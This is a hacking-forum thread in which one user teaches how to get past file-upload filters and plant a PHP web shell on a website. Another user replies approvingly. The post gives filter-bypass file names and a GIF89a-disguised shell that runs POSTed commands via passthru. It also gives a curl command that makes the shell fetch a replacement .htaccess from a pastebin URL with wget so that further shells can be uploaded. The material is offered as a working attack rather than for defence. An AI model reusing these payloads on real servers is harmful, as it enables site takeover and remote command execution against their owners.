Simple Trick to Bypass File Upload Problem

[abaykan]

We all know there are many ways to upload files / shell into the website. But this time I will share one trick that you may never try. Have you ever uploaded a file / shell, then when you access it, your file / shell is downloaded instead? It can be caused by .htaccess

AddType application/octet-stream .php

Then how will we manipulate it? Maybe you already know about, 

• Bypassing the Extension Black Listing.
  

shell.php1, shell.php2, etc.

• Bypass Case Sensitive Filter.
  

shell.PhP, shell.pHp1, etc.

• Bypass Using Double Extension.
  

shell.php.jpg, shell.php.pjpeg, shell.php;jpg, etc.

But now, I'll add a little about one way, and also maybe this is a fusion of the above ways.

Fool Server Side Check Using GIF89a; Header.
Sometimes server side content signature check can be fooled using "GIF89a;" header in your shell. Then you can save the shell with .php , .php.pjpeg or many extensions above. So heres an example:

PHP Code:

GIF89a;
<?php 
passthru($_POST['cmd']); __halt_compiler(); //or you can insert your complete shell code
?>

Open your terminal then type command bellow,

curl -d cmd="wget https://pastebin.com/raw/H8Ju85Jp -O .htaccess" urlshell

There I replace the default .htaccess server with my own .htaccess 
After that, you can re-upload your own php shell using .abay extension (or u can change it). Or you can use wget instead.

It's all for this tutorial, will soon draw you back with another tutorial. Sorry if my language is messy If you guys have an easier trick, you can write it in the comment field. Thanks!

[Insider]

Not a bad thread! I didn't actually know about the GIF89a method before. I made a similar thread a while ago, feel free to check it out if you want some more tips & tricks. https://greysec.net/showthread.php?tid=1455

[abaykan]

I've checked our thread before, and that's was inspire me to post this thread, lol. You're awesome!